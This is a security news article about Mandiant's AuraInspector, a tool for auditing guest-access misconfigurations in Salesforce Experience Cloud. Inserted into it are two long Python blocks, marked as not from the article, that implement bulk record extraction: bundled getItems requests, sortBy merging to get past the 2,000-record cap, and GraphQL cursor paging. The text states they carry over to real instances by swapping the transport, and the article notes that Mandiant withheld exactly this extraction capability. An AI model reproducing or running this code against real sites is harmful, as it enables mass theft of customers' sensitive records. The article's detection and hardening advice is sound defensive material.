Open-Source Misconfiguration Detection for Salesforce Aura


Mandiant has released AuraInspector, an open-source command-line tool designed to help security teams identify and audit access control misconfigurations within the Salesforce Aura framework that could expose sensitive data, including credit card numbers, identity documents, and health information.

The tool addresses a critical gap in Salesforce Experience Cloud security, where complex sharing rules and multi-level permission configurations often create blind spots for administrators.

AuraInspector automates detection of these exposures from an external perspective, providing actionable insights for remediation before attackers can exploit them.

Aura serves as the foundational technology behind Salesforce’s Lightning Experience, enabling modern single-page application functionality.

While this architecture improves user experience, it also introduces security complexities. The Aura endpoint, which front-end components use to retrieve backend data, has become one of the most targeted interfaces in Salesforce Experience Cloud applications.

Mandiant’s research reveals that misconfigurations frequently grant guest users unauthorized access to sensitive objects.

In controlled testing, the firm demonstrated that improperly configured Account object permissions could allow unauthenticated users to retrieve thousands of records via legitimate Aura methods such as getItems.

Technical Capabilities

AuraInspector automates several previously manual techniques for identifying misconfigurations.

The tool calls the getConfigData method to enumerate objects the current (guest) context can reach, then uses the getItems method to retrieve their records. To reduce network traffic it implements “action bulking”, bundling up to 100 actions into a single request to the Aura endpoint.

A key technique leverages the sortBy parameter to work around Salesforce’s 2,000-record retrieval limit.

Each sort order exposes a different 2,000-record window of the same object, so by re-running the query sorted on different fields in ascending and descending order and merging the results by record Id, security researchers can retrieve substantially more records than a single query allows and demonstrate the full impact of a misconfiguration.
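As an added example (not AuraInspector’s code and not from the article), the following Python sketches the two mechanics just described: packing getItems actions into Aura messages of at most 100 actions, and sweeping one object under several sort orders so that the union of the capped result sets exceeds 2,000 records. The getItems descriptor, the params block, the form field names of the Aura POST and the "Field ASC|DESC" sortBy format are taken from public Aura research and are assumptions here, not details the article provides; the server is a constructed in-memory stand-in that applies the cap, so the script runs offline.

```python
"""Bulked Aura getItems planning and the sortBy-union trick (added example)."""
import json

# Descriptor string as published in public Aura research; assumption, not from the article.
GET_ITEMS = ("serviceComponent://ui.force.components.controllers.lists."
             "selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems")
MAX_ACTIONS_PER_REQUEST = 100   # bulking ceiling named in the article
RECORD_CAP = 2000               # per-query retrieval ceiling named in the article


def get_items_action(action_id, entity, page, page_size=100, sort_by=None):
    """Build one getItems action. The 'Field ASC|DESC' sortBy wire format is an assumption."""
    params = {"entityNameOrId": entity, "layoutType": "LIST", "pageSize": page_size,
              "currentPage": page, "useTimeout": False, "getCount": True,
              "enableRowActions": False}
    if sort_by:
        params["sortBy"] = sort_by
    return {"id": f"{action_id};a", "descriptor": GET_ITEMS,
            "callingDescriptor": "UNKNOWN", "params": params}


def bulk_messages(actions, limit=MAX_ACTIONS_PER_REQUEST):
    """Pack actions into Aura 'message' payloads of at most `limit` actions each."""
    actions = list(actions)
    return [{"actions": actions[i:i + limit]} for i in range(0, len(actions), limit)]


def form_body(message, fwuid="UNKNOWN", app="siteforce:communityApp"):
    """Form fields of a POST to /s/sfsites/aura (field names from public research; assumption)."""
    context = {"mode": "PROD", "fwuid": fwuid, "app": app, "loaded": {},
               "dn": [], "globals": {}, "uad": False}
    return {"message": json.dumps(message), "aura.context": json.dumps(context),
            "aura.token": "null", "aura.pageURI": "/s/"}


def sweep_actions(entity, sort_orders, page_size=100):
    """Yield actions for every page inside the cap, once per sort order."""
    pages = RECORD_CAP // page_size
    n = 0
    for sort_by in sort_orders:
        for page in range(1, pages + 1):
            n += 1
            yield get_items_action(n, entity, page, page_size, sort_by)


# --- constructed stand-in for the server, so the example runs offline ---
def fake_server(records, action):
    """Apply the sort, the 2,000-record cap and the page slice, as the article describes."""
    p = action["params"]
    field, _, direction = (p.get("sortBy") or "Id ASC").partition(" ")
    ordered = sorted(records, key=lambda r: r[field], reverse=(direction == "DESC"))
    visible = ordered[:RECORD_CAP]
    start = (p["currentPage"] - 1) * p["pageSize"]
    rows = [{"record": r} for r in visible[start:start + p["pageSize"]]]
    return {"id": action["id"], "state": "SUCCESS", "returnValue": {"result": rows}}


def collect(records, entity, sort_orders):
    """Run a sweep against the fake server and union the results by Id."""
    seen = {}
    for message in bulk_messages(sweep_actions(entity, sort_orders)):
        for action in message["actions"]:
            for row in fake_server(records, action)["returnValue"]["result"]:
                seen[row["record"]["Id"]] = row["record"]
    return seen


# Constructed sample data: 3,000 Account-like records, more than one query can return.
SAMPLE = [{"Id": f"001{i:015d}", "Name": f"Account {i:04d}"} for i in range(3000)]

if __name__ == "__main__":
    print(len(collect(SAMPLE, "Account", ["Id ASC"])))             # 2000: capped
    print(len(collect(SAMPLE, "Account", ["Id ASC", "Id DESC"])))  # 3000: cap bypassed
```

The single ascending sweep stops at the cap; adding the descending order reaches the remaining 1,000 records, which is the whole point of varying sortBy. Against a real instance only the transport changes: each `form_body(message)` becomes one POST, and the responses are merged exactly as `collect` does.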

The tool also identifies Record Lists associated with objects, detects accessible Home URLs that may lead to administration panels, and checks whether self-registration is enabled. That last check matters because Salesforce has strengthened default Guest account security, which makes any path to an authenticated session, such as a self-registered account, increasingly valuable to attackers.

Default Record List view for Account object.

Perhaps most significantly, AuraInspector incorporates a previously undocumented technique using Salesforce’s GraphQL Aura controller to overcome pagination limitations.

While the standard Aura API restricts a query to 2,000 records, the GraphQL controller walks every record tied to an object through cursor-based pagination.

The GraphQL approach, accessible to unauthenticated users by default, provides standardized record retrieval, built-in introspection for field discovery, and support for mutations to test write privileges.

Mandiant identified a Spark instance administration dashboard accessible to any unauthenticated user via this method.

Spark instance administration dashboard.

Mandiant confirmed with Salesforce that this represents expected functionality when permissions are correctly configured, but in misconfigured environments, it dramatically amplifies potential data exposure.

All identified issues stem from configuration errors rather than product vulnerabilities. Salesforce administrators should audit Guest User permissions regularly, applying least privilege principles to ensure unauthenticated users can only access objects and fields essential for public functionality.

The cursor is a Base64-encoded string that identifies the last record retrieved, so a client can build it from scratch instead of depending on the value the server returned, and walk the object in batches of 2,000 records.

Retrieving next records using the cursor.
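As an added example covering the GraphQL controller and the cursor handling described above (not AuraInspector’s code), the following Python issues a cursor-paginated query for one object until pageInfo.hasNextPage is false and shows how a cursor can be built directly. The query shape follows the public Salesforce GraphQL API (uiapi) schema; that the decoded cursor is the zero-based offset of the last record returned is an assumption made so the example can construct one, not a format the article states; how the query is wrapped into an Aura action is left to the transport function, and the transport used here is a constructed in-memory stand-in.

```python
"""Cursor-based GraphQL pagination over one Salesforce object (added example)."""
import base64
import re

PAGE_SIZE = 2000  # per-page ceiling named in the article

# Query shape per the public Salesforce GraphQL API (uiapi) schema.
QUERY_TEMPLATE = """query Records($after: String) {
  uiapi {
    query {
      %s(first: %d, after: $after) {
        edges { node { Id } }
        pageInfo { hasNextPage endCursor }
      }
    }
  }
}"""


def build_query(sobject, page_size=PAGE_SIZE):
    return QUERY_TEMPLATE % (sobject, page_size)


def build_introspection(sobject):
    """Standard GraphQL introspection to discover an object's fields."""
    return '{ __type(name: "%s") { fields { name } } }' % sobject


def encode_cursor(offset):
    """Assumption: the cursor decodes to the zero-based offset of the last record returned."""
    return base64.b64encode(str(offset).encode()).decode()


def decode_cursor(cursor):
    return int(base64.b64decode(cursor).decode())


def fetch_all(sobject, transport, page_size=PAGE_SIZE):
    """Follow pageInfo.endCursor until hasNextPage is false. Returns (records, request_count)."""
    records, after, requests = [], None, 0
    while True:
        body = {"query": build_query(sobject, page_size), "variables": {"after": after}}
        data = transport(body)          # transport = however the query reaches the controller
        requests += 1
        conn = data["data"]["uiapi"]["query"][sobject]
        records.extend(edge["node"] for edge in conn["edges"])
        if not conn["pageInfo"]["hasNextPage"]:
            return records, requests
        after = conn["pageInfo"]["endCursor"]


def make_fake_transport(total):
    """Constructed stand-in for the GraphQL controller holding `total` records."""
    ids = [f"001{i:015d}" for i in range(total)]

    def transport(body):
        m = re.search(r"(\w+)\(first: (\d+)", body["query"])
        sobject, page_size = m.group(1), int(m.group(2))
        after = body["variables"]["after"]
        start = decode_cursor(after) + 1 if after else 0
        page = ids[start:start + page_size]
        last = start + len(page) - 1
        return {"data": {"uiapi": {"query": {sobject: {
            "edges": [{"node": {"Id": i}} for i in page],
            "pageInfo": {"hasNextPage": last < total - 1,
                         "endCursor": encode_cursor(last) if page else None}}}}}}
    return transport


if __name__ == "__main__":
    records, n = fetch_all("Account", make_fake_transport(4500))
    print(len(records), "records in", n, "requests")   # 4500 records in 3 requests
    print(decode_cursor(encode_cursor(1999)))           # 1999
```

Because the loop only trusts `hasNextPage` and `endCursor`, it keeps working if the real cursor encoding differs from the assumed offset; `encode_cursor` is only needed to resume a walk from an arbitrary position.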

Reviewing sharing rules and organization-wide defaults ensures authenticated users access only explicitly permitted records.

Mandiant has also provided detection resources including a Burp Suite BCheck for identifying hidden Salesforce references in JavaScript files and a Google SecOps UDM query to flag POST requests to Aura endpoints, enabling organizations to monitor for potential reconnaissance activity.

Turning off unnecessary self-registration prevents unauthorized account creation, while following Salesforce’s Security Guide recommendations, including use of the Security Health Check tool, helps maintain robust configurations.

AuraInspector is available immediately on GitHub, where Mandiant has released the core detection capabilities while withholding data extraction functionality to prevent misuse.

The tool automatically discovers Aura endpoints, retrieves Home and Record List URLs, and determines self-registration status, all through read-only operations that leave target instances unmodified.

For organizations requiring comprehensive Salesforce security assessments, Mandiant Consulting offers specialized services to identify misconfigurations, validate security postures, and ensure compliance with best practices for protecting sensitive data in cloud environments.
